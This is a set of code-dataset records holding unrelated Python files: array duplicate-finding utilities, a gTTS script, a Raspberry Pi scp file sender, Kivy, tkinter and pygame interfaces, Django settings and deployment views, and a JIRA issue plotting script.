picture\n","sub_path":"day11/Robot.py","file_name":"Robot.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"201486798","text":"# -*- coding:UTF-8 -*-\r\n\r\n\"\"\"\r\nFind the first non-repeating integer in an array (Python)\r\n\"\"\"\r\n\r\nimport collections\r\n\r\n\r\n# If the array contains exactly one non-repeating number: start from 0 and XOR every value into it; the final value is the number we want:\r\ndef findNoDupOnlyOne(data):\r\n    single = 0\r\n    for v in data:\r\n        single = single ^ v\r\n    return single\r\n\r\n\r\n# If more than one number is non-repeating: traverse the array once, using a map to record each number and how often it appears; then traverse the map and return a number whose count is 1:\r\n# Find the first non-repeating number (buggy with negative numbers)\r\ndef findNoDupMany(data):\r\n    single = 0\r\n    Map = {}\r\n    for i in range(len(data)):\r\n        if data[i] in Map:\r\n            Map[data[i]] += 1\r\n        else:\r\n            Map[data[i]] = 1\r\n    for key in Map:\r\n        if Map[key] == 1:\r\n            single = key\r\n            break\r\n    return single\r\n\r\n\r\n# Find the first non-repeating number, using an OrderedDict\r\ndef findFirstNoDupMany(data):\r\n    single = 0\r\n    Map = collections.OrderedDict()\r\n    for i in range(len(data)):\r\n        if data[i] in Map:\r\n            Map[data[i]] += 1\r\n        else:\r\n            Map[data[i]] = 1\r\n    print(Map)\r\n    for key in Map:\r\n        if Map[key] == 1:\r\n            single = key\r\n            break\r\n    return single\r\n\r\n\r\n# Find the first repeated number\r\ndef findFirstDup(numbers, duplication):\r\n    # write code here\r\n    numbers_set = set()\r\n    for i in numbers:\r\n        if i not in numbers_set:\r\n            numbers_set.add(i)\r\n        else:\r\n            duplication[0] = i\r\n            return True\r\n    return False\r\n\r\n\r\nlist = [2, 3, 3, 1, 0, 2, 5, 3]\r\n\r\n\r\ndef nodup(list):\r\n    for ind, i in enumerate(list):\r\n        tmp = list[ind + 1:]\r\n        for ind_j, j in enumerate(tmp):\r\n            if i == j:\r\n                break\r\n            if ind_j == len(tmp) - 1 and i != j:\r\n                return i\r\n\r\n\r\n# print(nodup(list))\r\n\r\ndata = [-10, -1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6]\r\nprint(findFirstNoDupMany(data))\r\n","sub_path":"Classic/NoDup.py","file_name":"NoDup.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"640164270","text":"from gtts import gTTS\nimport string\n\n\ndef 
punc_remover(s):\n new_s = \"\"\n for i in s:\n if i not in string.punctuation:\n new_s += i\n return new_s\n\n\ns = input(\"Write your word:\\n\")\ntts = gTTS(text=s, lang='en')\ntts.save(\"{0}.mp3\".format(punc_remover(s)))\n","sub_path":"console code maker/gTTS/en/gTTS en.py","file_name":"gTTS en.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"333127702","text":"# program to send files constantly to a server through the pi once a connection\n# has been established\nimport subprocess\nimport time, os, threading\n\ndef sendFile(files, seconds):\n toSend = files\n for i in toSend:\n path = i\n print(i)\n destination = 'wow@192.168.1.15:/home/wow/Desktop/Data'\n process = os.popen('scp ' + path + ' ' + destination)\n preprocessed = process.read()\n process.close()\n print('success')\n time.sleep(seconds)\n \ndef findFiles():\n path = '/home/pi/Desktop/DataDump/'\n files = []\n \n for r, d, f in os.walk(path):\n for file in f:\n files.append(os.path.join(r, file))\n \n #for f in files:\n #print(f)\n return files \n \ntoFind = findFiles()\nsendFile(toFind, 90)","sub_path":"MachineLearningScripts/FileSender.py","file_name":"FileSender.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"135529983","text":"from kivy.uix.screenmanager import Screen\nfrom kivy.uix.button import Button\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.uix.widget import Widget\nfrom kivy.uix.screenmanager import SlideTransition\nfrom kivy.uix.label import Label\nfrom kivy.graphics.instructions import InstructionGroup\nfrom kivy.graphics import Color, Rectangle\n\nfrom StudentDetailsWidget import StudentDetailsWidget\nfrom ColorBoxLayout import ColorBoxLayout\n\nitemSpacing = 12\ncontentPadding = 12\n\nfrom functools import partial\nclass SubjectsScreen(Screen): \n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n # self.subjects = kwargs['subjects']\n self.data = []\n \n boxLayout = ColorBoxLayout(orientation='vertical', color=Color(162/255, 162/255, 165/255,1))\n \n #scroll view\n self.scrollView = ScrollView()\n self.contentView = BoxLayout(orientation='vertical', padding=contentPadding, spacing=itemSpacing, pos_hint={'top': 1})\n self.scrollView.add_widget(self.contentView)\n\n #navigation bar\n self.navigationBar = ColorBoxLayout(orientation='horizontal', size_hint_y=None, height=140) \n \n self.backButton = Button(size_hint=(None,1), width= 260, text='< Back', background_color=(0, 0, 0, 0))\n self.backButton.on_press = self.back\n \n self.navigationBar.add_widget(Label(text='Subjects', size_hint_x=None, width=380, font_size=70))\n self.navigationBar.add_widget(Widget())\n self.navigationBar.add_widget(self.backButton)\n\n boxLayout.add_widget(self.navigationBar)\n boxLayout.add_widget(self.scrollView)\n self.add_widget(boxLayout) \n \n self.studentDetailsWidget = StudentDetailsWidget(size_hint_y=None, height=200)\n boxLayout.add_widget(self.studentDetailsWidget) \n\n def set_data(self, data): \n self.data = data\n self.studentDetailsWidget.set_student_data(data['current']) \n self.update()\n\n def on_pre_enter(self, *args): \n self.update() \n\n def update(self):\n self.contentView.clear_widgets() \n buttonHeight = 200\n for i in range(len(self.data['modules'])):\n \n subjectButton = Button(background_normal='', color=(0.1,0.1,0.1,1), 
font_size=50)\n subjectButton.size_hint_y = None \n subjectButton.height = buttonHeight\n subjectButton.text = '{0} {1}'.format(self.data['modules'][i]['id'], self.data['modules'][i]['name'])\n subjectButton.on_press=partial(self.select_subject, i) \n self.contentView.add_widget(subjectButton)\n\n self.contentView.size_hint_y = None\n self.contentView.height = len(self.data['modules'])*(buttonHeight + itemSpacing) - itemSpacing + 2*contentPadding\n \n def back(self):\n self.parent.transition = SlideTransition(direction=\"right\")\n self.parent.current = 'LOGIN_SCREEN'\n\n def select_subject(self, index):\n self.parent.transition = SlideTransition(direction=\"left\")\n self.parent.current = 'PROFESSORS_SCREEN'\n self.parent.professorsScreen.select_subject(index) \n\n","sub_path":"SubjectsScreen.py","file_name":"SubjectsScreen.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"175695356","text":"from pathlib import Path\n\nfrom decouple import config as secret\n\n# Build paths inside the project like this: BASE_DIR / 'subdir'.\nBASE_DIR = Path(__file__).resolve().parent.parent.parent\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = secret(\n \"DAJNGO_SECRET_KEY\", default=\"2x$e%!k_u_0*gq0s4!_u(2(^lpy&gir0hg)q&5nurj0-sseuav\"\n)\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = secret(\"DJANGO_DEBUG\", cast=bool, default=True)\n\nALLOWED_HOSTS = [\"bolsonaro-api.herokuapp.com\", \"127.0.0.1\"]\n\n\n# Application definition\n\nDEFAULT_APPS = [\n \"django.contrib.admin\",\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sessions\",\n \"django.contrib.messages\",\n \"django.contrib.staticfiles\",\n]\n\nLOCAL_APPS = [\n \"quotes.apps.QuotesConfig\",\n \"actions.apps.ActionsConfig\",\n]\n\nTHIRD_PARTY_APPS = [\n \"taggit\",\n \"taggit_labels\",\n \"rest_framework\",\n \"corsheaders\",\n \"drf_recaptcha\",\n \"django_filters\",\n \"drf_yasg\",\n]\n\n\nINSTALLED_APPS = DEFAULT_APPS + LOCAL_APPS + THIRD_PARTY_APPS\n\n\nMIDDLEWARE = [\n \"corsheaders.middleware.CorsMiddleware\",\n \"whitenoise.middleware.WhiteNoiseMiddleware\",\n \"django.middleware.security.SecurityMiddleware\",\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.middleware.common.CommonMiddleware\",\n \"django.middleware.csrf.CsrfViewMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n \"django.middleware.clickjacking.XFrameOptionsMiddleware\",\n]\n\nROOT_URLCONF = \"bolsonaro_api.urls\"\n\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"DIRS\": [BASE_DIR / \"static\" / \"templates\"],\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n \"context_processors\": [\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n ],\n },\n },\n]\n\n\nWSGI_APPLICATION = \"bolsonaro_api.wsgi.application\"\n\n\n# Database\n# https://docs.djangoproject.com/en/3.1/ref/settings/#databases\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": secret(\"DATABASE_ENGINE\", default=\"django.db.backends.sqlite3\"),\n \"PORT\": 
secret(\"DATABASE_PORT\", cast=int, default=5432),\n        \"USER\": secret(\"DATABASE_USER\", default=\"user\"),\n        \"NAME\": secret(\"DATABASE_NAME\", default=BASE_DIR / \"db.sqlite3\"),\n        \"PASSWORD\": secret(\"DATABASE_PASSWORD\", default=\"password\"),\n        \"HOST\": secret(\"DATABASE_HOST\", default=\"localhost\"),\n    }\n}\n\n# Password validation\n# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n    {\n        \"NAME\": \"django.contrib.auth.password_validation.UserAttributeSimilarityValidator\",\n    },\n    {\n        \"NAME\": \"django.contrib.auth.password_validation.MinimumLengthValidator\",\n    },\n    {\n        \"NAME\": \"django.contrib.auth.password_validation.CommonPasswordValidator\",\n    },\n    {\n        \"NAME\": \"django.contrib.auth.password_validation.NumericPasswordValidator\",\n    },\n]\n\nLOGGING = {\n    \"version\": 1,\n    \"disable_existing_loggers\": False,\n    \"formatters\": {\n        \"default\": {\n            \"format\": \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\",\n            \"datefmt\": \"%d/%m/%Y %H:%M:%S\",\n        }\n    },\n    \"handlers\": {\n        \"console\": {\n            \"level\": \"DEBUG\",\n            \"class\": \"logging.StreamHandler\",\n            \"formatter\": \"default\",\n        }\n    },\n    \"loggers\": {\"django\": {\"handlers\": [\"console\"]}},\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/3.1/topics/i18n/\n# LANGUAGE_CODE is set once, below, to \"pt-br\"\n\nTIME_ZONE = \"UTC\"\n\nUSE_I18N = True\n\nUSE_L10N = False\n\nUSE_TZ = True\n\nDATE_INPUT_FORMATS = [\"%d/%m/%Y\"]\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/3.1/howto/static-files/\n\nSTATIC_ROOT = BASE_DIR / \"static\"\nSTATIC_URL = \"/static/\"\n\nEMAIL_HOST_USER = secret(\"EMAIL_HOST_USER\", default=\"\")\nEMAIL_BACKEND = \"sendgrid_backend.SendgridBackend\"\nSENDGRID_API_KEY = secret(\"SENDGRID_API_KEY\", default=\"\")\nSENDGRID_SANDBOX_MODE_IN_DEBUG = secret(\n    \"SENDGRID_SANDBOX_MODE_IN_DEBUG\", cast=bool, default=True\n)\n\n\nLANGUAGE_CODE = \"pt-br\"\nCORS_ALLOW_ALL_ORIGINS = True\n\n\nREST_FRAMEWORK = {\n    \"DATE_INPUT_FORMATS\": [\"%d/%m/%Y\"],\n    \"TEST_REQUEST_DEFAULT_FORMAT\": \"json\",\n    \"DEFAULT_THROTTLE_CLASSES\": [\"rest_framework.throttling.AnonRateThrottle\"],\n    \"DEFAULT_THROTTLE_RATES\": {\"anon\": \"100000/day\"},\n    \"DEFAULT_FILTER_BACKENDS\": (\"django_filters.rest_framework.DjangoFilterBackend\",),\n    \"DEFAULT_PAGINATION_CLASS\": \"rest_framework.pagination.PageNumberPagination\",\n    \"PAGE_SIZE\": 10,\n}\nDRF_RECAPTCHA_SECRET_KEY = secret(\"RECAPTCHA_SECRET_KEY\", default=\"\")\n# https://developers.google.com/recaptcha/docs/faq#id-like-to-run-automated-tests-with-recaptcha.-what-should-i-do\n\nTWITTER_API_KEY = secret(\"TWITTER_API_KEY\", default=\"\")\nTWITTER_API_SECRET_KEY = secret(\"TWITTER_API_SECRET_KEY\", default=\"\")\nTWITTER_API_TOKEN = secret(\"TWITTER_API_TOKEN\", default=\"\")\nTWITTER_API_SECRET_TOKEN = secret(\"TWITTER_API_SECRET_TOKEN\", default=\"\")\n\nCELERY_BROKER_URL = secret(\"REDIS_URL\", default=\"redis://localhost:6379\")\nCELERY_RESULT_BACKEND = secret(\"REDIS_URL\", default=\"redis://localhost:6379\")\nCELERY_ACCEPT_CONTENT = [\"application/json\"]\nCELERY_RESULT_SERIALIZER = \"json\"\nCELERY_TASK_SERIALIZER = \"json\"\n\nSWAGGER_SETTINGS = {\"USE_SESSION_AUTH\": False}\n","sub_path":"django/bolsonaro_api/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"490395889","text":"#!/usr/bin/env python\n#coding:utf-8\n#author: 
moore moorewqk@163.com\n\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse,JsonResponse\n\nfrom django.views.generic.base import View\nfrom braces.views import LoginRequiredMixin\n\n\nimport json\nfrom jadehare.settings import BASE_DIR\n\nfrom .api import ServiceDeployFlow, ServiceStatus_init, GenOpsID, GetRecord\nfrom tools.uilts import RecordLog\nfrom .models import ServiceDeploy\nfrom service.models import ServiceStatus\nfrom .forms import ServiceDeployForm\n\n\nclass ServiceDeployListView(LoginRequiredMixin,View):\n\n    def get(self,request):\n        temp_name = \"deploycm/deploycm-header.html\"\n        agentdeploy_list = ServiceDeploy.objects.all()\n\n        return render(request,'deploycm/agentdeploy_list.html',locals())\n\n\nclass TryDeployView(LoginRequiredMixin,View):\n\n    def get(self,request,id):\n        instance = ServiceDeploy.objects.get(id=id)\n        opsid = GenOpsID (instance=instance)\n        instance.opsid = opsid\n        instance.save ()\n\n        res = ServiceDeployFlow (instance=instance, request=request)\n        if res:\n            instance.deploy_status = 1\n            instance.save ()\n            status = 1\n            msg = \"Deploy {servicename} succeeded\".format (servicename=instance.service.name)\n            # render to the browser\n            result = {\n                'status': status,\n                \"msgs\": msg,\n            }\n            return HttpResponse (json.dumps (result), content_type=\"application/json\")\n\n        else:\n            instance.deploy_status = 2\n            instance.save ()\n            status = 2\n            msg = \"Deploy {servicename} failed\".format (servicename=instance.service.name)\n            # render to the browser\n            result = {\n                'status': status,\n                \"msgs\": msg,\n            }\n            return HttpResponse (json.dumps (result), content_type=\"application/json\")\n    \n    \n    \n\n\nclass ServiceDeployAddView(LoginRequiredMixin,View):\n\n    def get(self,request):\n        temp_name = \"deploycm/deploycm-header.html\"\n        display_control = 'none'\n        agentdeploy_form = ServiceDeployForm()\n        return render(request,'deploycm/agentdeploy_add.html',locals())\n\n    def post(self,request):\n        temp_name = \"deploycm/deploycm-header.html\"\n        agentdeploy_form = ServiceDeployForm(request.POST)\n        if agentdeploy_form.is_valid():\n            #1. Synchronously call the API to run the deploy flow,\n            #2. then write the deploy flow logs into the log record table\n            deploy_env = agentdeploy_form.cleaned_data[\"deploy_env\"]\n            service = agentdeploy_form.cleaned_data[\"service\"]\n            # isService = ServiceStatus.objects.\n            #isDeployObjList = ServiceDeploy.objects.filter(service_id=service).filter(deploy_env=deploy_env)\n            isdepHosts = []\n            isdeploy = ServiceStatus.objects.filter(service_name=service.name)\n            # print(isdeploy)\n            if isdeploy and len(isdeploy) > 0:\n                for dep in isdeploy:\n                    if dep.host in [host.asset_ip for host in agentdeploy_form.cleaned_data[\"hostList\"]]:\n                        isdepHosts.append(dep.host)\n            \n            if len(isdepHosts) > 0:\n                msg = \"Software/service {projectname} already exists on hosts {isdepHosts}, please do not deploy it again\".format(projectname=service.name,isdepHosts=isdepHosts)\n                status = 3\n                results = {\n                    'agentdeploy_form': agentdeploy_form,\n                    'request': request,\n                    'temp_name': temp_name,\n                    'status': status,\n                    \"msgs\": json.dumps(msg,ensure_ascii=False)\n                }\n                return render(request, \"deploycm/agentdeploy_add.html\", results)\n            else:\n                instance = agentdeploy_form.save()\n                ServiceStatus_init (instance=instance)\n                opsid = GenOpsID (instance=instance)\n                instance.opsid = opsid\n                instance.save()\n                res = ServiceDeployFlow (instance=instance, request=request)\n                if res:\n                    instance.status = 1\n                    instance.save ()\n                    status = 1\n                    msg = \"Deploy {servicename} succeeded\".format (servicename=instance.service.name)\n                    # render to the browser\n                    results = {\n                        'agentdeploy_form': agentdeploy_form,\n                        'request': request,\n                        'temp_name': temp_name,\n                        'status': status,\n                        \"msgs\": msg,\n                    }\n                    
return render (request, \"deploycm/agentdeploy_add.html\", results)\n\n                else:\n                    instance.status = 2\n                    instance.save ()\n                    status = 2\n                    msg = \"Deploy {servicename} failed\".format (servicename=instance.service.name)\n                    # render to the browser\n                    results = {\n                        'agentdeploy_form': agentdeploy_form,\n                        'request': request,\n                        'temp_name': temp_name,\n                        'status': status,\n                        \"msgs\": msg,\n                    }\n                    return render (request, \"deploycm/agentdeploy_add.html\", results)\n        else:\n            \n            status = 2\n            msg = \"Deploy failed\"\n            results = {\n                'agentdeploy_form': agentdeploy_form,\n                'request': request,\n                'temp_name': temp_name,\n                'status': status,\n                \"msgs\": msg,\n            }\n            return render (request, \"deploycm/agentdeploy_add.html\", results)\n\n\nclass ServiceDeployEditView(LoginRequiredMixin,View):\n\n    def get(self,request,id):\n        temp_name = \"deploycm/deploycm-header.html\"\n        obj = ServiceDeploy.objects.filter(id=id)\n        if len(obj) == 1:\n            obj = obj[0]\n        else:\n            obj = None\n\n        agentdeploy_form = ServiceDeployForm(instance=obj)\n        return render(request,'deploycm/agentdeploy_edit.html',locals())\n\n    def post(self,request,id):\n        temp_name = \"deploycm/deploycm-header.html\"\n        obj = ServiceDeploy.objects.filter(id=id)\n        if len(obj) == 1:\n            obj = obj[0]\n        else:\n            obj = None\n\n        agentdeploy_form = ServiceDeployForm(request.POST,instance=obj)\n        if agentdeploy_form.is_valid():\n            instance = agentdeploy_form.save()\n            msg = \"Edit succeeded\"\n            RecordLog.WLogRecord (opsid=instance.opsid, user=request.user, fname=\"deploycm\",\n                                  status=\"faild\", message=msg)\n            status = 1\n            msgs = json.dumps(\"Edit succeeded\")\n            return render(request,'deploycm/agentdeploy_edit.html',locals())\n        else:\n            status = 2\n            msg = \"Edit failed\"\n            RecordLog.WLogRecord (opsid=obj.opsid, user=request.user, fname=\"deploycm\",\n                                  status=\"faild\", message=msg)\n            msgs = json.dumps(\"Edit failed\")\n            return render(request,'deploycm/agentdeploy_edit.html',locals())\n    \n\nclass ServiceDeployDeleteView(LoginRequiredMixin,View):\n\n    def get(self,request):\n        agentdeploy_id = request.GET.get('id','')\n        if agentdeploy_id:\n            try:\n                ServiceDeploy.objects.filter(id=agentdeploy_id).delete()\n                status = 0\n                msgs = \"Delete succeeded\"\n                return JsonResponse({\"status\":status,\"msgs\":msgs})\n            except Exception as e:\n                status = 1\n                msgs = \"Delete failed\"\n                return JsonResponse({\"status\":status,\"msgs\":msgs})\n\nclass ServiceDeployLogDetailView(LoginRequiredMixin,View):\n\n    def get(self,request,opsid):\n        temp_name = \"deploycm/deploycm-header.html\"\n        # msgs = GetRecord(opsid)\n        msgs = RecordLog.RecordDisplay(opsid)\n        results = {\n            'request': request,\n            'temp_name': temp_name,\n            \"msgs\": msgs\n        }\n        return render(request,'deploycm/agentdeploylogdetail.html',results)\n\n\nclass ServiceDeployHostsView(LoginRequiredMixin,View):\n\n\tdef get(self,request,id):\n\t\ttemp_name = \"deploycm/deploycm-header.html\"\n\t\tservicedeploy = ServiceDeploy.objects.get(id=id)\n\t\thost_list = [ host.asset_ip for host in servicedeploy.hostList.all()]\n\t\tprint(\"hhhh\",host_list)\n\t\treturn HttpResponse(json.dumps(host_list),content_type=\"application/json\")","sub_path":"deploycm/servicedeploy.py","file_name":"servicedeploy.py","file_ext":"py","file_size_in_byte":8613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"623376051","text":"import tkinter as tk\nfrom tkinter import messagebox as tkMessageBox\nimport requests\n\nclass Page1View(tk.Frame):\n    \"\"\" Page 1 \"\"\"\n\n    def __init__(self, parent, submit_callback, delete_callback, update_callback, detail_callback):\n        \"\"\" Initialize Page 1 \"\"\"\n        
tk.Frame.__init__(self, parent, width=1200, height=1200, padx=20)\n self._parent = parent\n self._submit_callback = submit_callback\n self._delete_callback = delete_callback\n self._update_callback = update_callback\n self._detail_callback = detail_callback\n self._create_widgets()\n\n def _create_widgets(self):\n \"\"\" Creates the widgets for Page 1 \"\"\"\n self._label = tk.Label(self, text=\"Movie\")\n self._label.grid(row=1, column=2, padx=50)\n\n self._scrollbar = tk.Scrollbar(self, orient=tk.VERTICAL)\n\n self._listbox = tk.Listbox(self, yscrollcommand=self._scrollbar.set)\n self._scrollbar.config(command=self._listbox.yview)\n self._listbox.grid(row=2, columnspan=5, ipadx=100, ipady=20)\n self._scrollbar.grid(row=2, column=6, sticky=tk.N+tk.S+tk.E)\n\n self._button1 = tk.Button(self,\n text=\"Refresh\",\n command=self._submit_callback)\n self._button1.grid(row=3, column=1, pady=5)\n\n self._button1 = tk.Button(self,\n text=\"Update\",\n command=self._update_callback)\n self._button1.grid(row=3, column=2, pady=5)\n\n self._button1 = tk.Button(self,\n text=\"Delete\",\n command=self._delete_callback)\n self._button1.grid(row=3, column=3, pady=5)\n\n self._button1 = tk.Button(self,\n text=\"Details\",\n command=self._detail_callback)\n self._button1.grid(row=3, column=4, pady=5)\n\n def set_form_data(self, data):\n self._listbox.delete(0, tk.END)\n if data is None:\n self._listbox.insert(tk.END, \"\")\n return\n for m in data:\n self._listbox.insert(tk.END, \"{}--{}\".format(m[\"name\"], m[\"id\"]))\n\n def get_id(self):\n if len(self._listbox.curselection()) != 0:\n index = self._listbox.curselection()[0]\n id = int(self._listbox.get(0, tk.END)[index].split(\"--\")[1])\n return str(id)\n\n else:\n tkMessageBox.showerror(\"Error\", \"No item is selected.\")\n raise ValueError\n\n def delete_id(self, id):\n index = self._listbox.curselection()[0]\n name = str(self._listbox.get(0, tk.END)[index].split(\"--\")[0])\n if tkMessageBox.askyesno('Verify', 'Delete ' + name + \"?\"):\n return id\n\n def get_detail(self, ent):\n tkMessageBox.showinfo(\"Details\", \"Name: {}\\nYear Released: {}\\nDirector: {}\\nRating: {}\\nLength: {}\"\n .format(ent['name'], ent['year_released'], ent['director'], ent['rating'], ent['length']))\n\n def get_selected(self, data):\n if self.get_id() is not None:\n for m in data:\n if m[\"id\"] == int(self.get_id()):\n return m\n\n\n\n","sub_path":"page1_view.py","file_name":"page1_view.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"607990422","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nimport re\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef plot_num_per_reporter(df):\n reporter = pd.DataFrame(df.loc[:, ['issuekey', 'reporter']])\n reporter = reporter.groupby('reporter').count()\n reporter = reporter[reporter.issuekey > 10]\n print(reporter)\n bar = reporter.plot(kind='bar', title='Num per Reporter')\n \n plt.xticks(np.arange(len(reporter)), reporter.index, rotation=90)\n for p in bar.patches:\n bar.annotate(str(p.get_height()), xy=(p.get_x(), p.get_height()+2))\n\ndef plot_num_per_release(df):\n fixVersions = pd.DataFrame(df.loc[:, ['issuekey', 'fixVersions']])\n for i, r in fixVersions.iterrows():\n s = str(fixVersions.get_value(i, 'fixVersions'))\n fixVersions.set_value(i, 'fixVersions', re.sub(r'((\\d[.]\\d)+(SP1)?)(.*)', '\\g<1>', re.sub(r'\\s', '', s)))\n fixVersions = fixVersions.groupby('fixVersions').count()\n bar 
= fixVersions.plot(kind='bar', title='Num per Release')\n \n plt.xticks(np.arange(len(fixVersions)), fixVersions.index, rotation=60)\n for p in bar.patches:\n bar.annotate(str(p.get_height()), xy=(p.get_x(), p.get_height()+2))\n\n\n\ndf = pd.read_csv('allResolvedIssues.txt', '@')\nplot_num_per_release(df)\nplot_num_per_reporter(df)\nplt.show()\n","sub_path":"jira_plot.py","file_name":"jira_plot.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"327426059","text":"#!/usr/bin/python3\n\nimport sys\nimport pygame\nfrom pygame.locals import *\nimport subprocess\nimport os\nfrom scroll_menu import Menu\nimport pygame.mixer\nfrom conf import Config\nfrom player import Player\nfrom reset_button_handler import GPIOButtonHandler\nimport copy\n\nglobal current_proc\nglobal is_only_one_game\n\nif not pygame.font.get_init():\n pygame.font.init()\n \ndef exit(menu):\n menu.destroy()\n pygame.display.quit()\n sys.exit()\n \ndef return_to_menu():\n global current_proc\n if current_proc != None:\n current_proc.kill()\n\ndef start_game_if_alone(conf):\n global current_proc\n global is_only_one_game\n files = 0\n filepath = \"\"\n emulator_command = []\n for dirname, dirnames, filenames in os.walk(conf.get_conf_for_label('root')['dir']):\n # print path to all filenames.\n conf_for_dir = conf.get_conf_for_dir(dirname)\n rom_suffixes = conf_for_dir['rom_suffixes']\n emulator_command = copy.deepcopy(conf_for_dir['emulator_command'])\n for filename in filenames:\n if filename[filename.rfind('.'):].lower() in rom_suffixes or len(rom_suffixes) == 0:\n files += 1\n filepath = os.path.join(dirname, filename)\n for i in range(len(emulator_command)):\n if emulator_command[i].find('%ROM%') == -1:\n continue\n emulator_command[i] = emulator_command[i].replace('%ROM%', filepath)\n if files == 1:\n is_only_one_game = True\n current_proc = subprocess.Popen(emulator_command)\n current_proc.wait()\n else:\n is_only_one_game = False\n\n\nif __name__ == \"__main__\":\n global current_proc\n global is_only_one_game\n current_proc = None\n reset_handler = GPIOButtonHandler(return_to_menu, 13)\n reset_handler.start()\n \n conf = Config()\n \n is_only_one_game = True\n while is_only_one_game:\n start_game_if_alone(conf)\n \n player = Player()\n screen = pygame.display.set_mode((0,0), pygame.FULLSCREEN) #0,6671875 and 0,(6) of HD resoultion\n \n menu = Menu(conf, player)\n menu.set_dir(conf.get_conf_for_label('root')['dir'])\n menu.render(screen, full_update = True)\n \n pygame.joystick.init()\n joystick = pygame.joystick.Joystick(0)\n joystick.init()\n pygame.key.set_repeat(199,69)#(delay,interval)\n while 1:\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n # What action should we do?\n if event.key == K_UP:\n menu.move_selection(-1)\n menu.render(screen)\n if event.key == K_DOWN:\n menu.move_selection(1)\n menu.render(screen)\n if event.key == K_RETURN:\n #menu = \n selected_menu_item = menu.menu_items[menu.selected_menu_item]\n if selected_menu_item.action.action_type == 'navigate':\n menu.set_dir(menu.menu_items[menu.selected_menu_item].action.action)\n menu.render(screen, full_update = True)\n elif selected_menu_item.action.action_type == 'execute':\n player.pause()\n pygame.display.quit()\n current_proc = subprocess.Popen(selected_menu_item.action.action)\n current_proc.wait()\n player.resume()\n pygame.display.init()\n pygame.mouse.set_visible(False)\n screen = pygame.display.set_mode((0,0), pygame.FULLSCREEN) 
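The jira_plot.py record above relies on DataFrame.get_value/set_value, which were deprecated in pandas 0.21 and removed in 1.0. A minimal sketch of the same per-row cleanup with the still-supported label-based .at accessor (the regex and column name are taken from the snippet; the function name is an assumption):

import re
import pandas as pd

def normalize_versions(fixVersions: pd.DataFrame) -> pd.DataFrame:
    # same cleanup as the iterrows loop above, without the removed get_value/set_value
    for i in fixVersions.index:
        s = str(fixVersions.at[i, 'fixVersions'])
        fixVersions.at[i, 'fixVersions'] = re.sub(r'((\d[.]\d)+(SP1)?)(.*)', r'\g<1>', re.sub(r'\s', '', s))
    return fixVersions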
#0,6671875 and 0,(6) of HD resoultion\n menu.render(screen, full_update = True)\n if event.key == K_ESCAPE:\n exit(menu)\n elif event.type == QUIT:\n exit(menu)\n\t\n\t#### JOYPAD CONFIGURATION ####\n axis0 = round(joystick.get_axis(0))\n axis1 = round(joystick.get_axis(1))\n if axis1 == -1:\n menu.move_selection(-1)\n menu.render(screen)\n if axis1 == 1:\n menu.move_selection(1)\n menu.render(screen)\n if axis0 == -1:\n menu.move_selection(-3)\n menu.render(screen) \n if axis0 == 1:\n menu.move_selection(3)\n menu.render(screen) \n #menu = \n if joystick.get_button( 0 ) == 1:\n selected_menu_item = menu.menu_items[menu.selected_menu_item]\n if selected_menu_item.action.action_type == 'navigate':\n menu.set_dir(menu.menu_items[menu.selected_menu_item].action.action)\n menu.render(screen, full_update = True)\n elif selected_menu_item.action.action_type == 'execute':\n player.pause()\n pygame.display.quit()\n current_proc = subprocess.Popen(selected_menu_item.action.action)\n current_proc.wait()\n current_proc = None\n player.resume()\n pygame.display.init()\n pygame.mouse.set_visible(False)\n screen = pygame.display.set_mode((0,0), pygame.FULLSCREEN) #0,6671875 and 0,(6) of HD resoultion\n menu.render(screen, full_update = True)\n if joystick.get_button( 1 ) == 1:\n menu.set_dir(menu.back_action.action)\n menu.render(screen, full_update = True)\n pygame.time.wait(8)\n 